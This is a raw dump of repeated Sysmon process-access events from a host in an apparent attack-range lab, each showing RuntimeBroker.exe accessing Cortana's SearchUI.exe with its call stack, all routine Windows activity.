13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.560{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.545{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 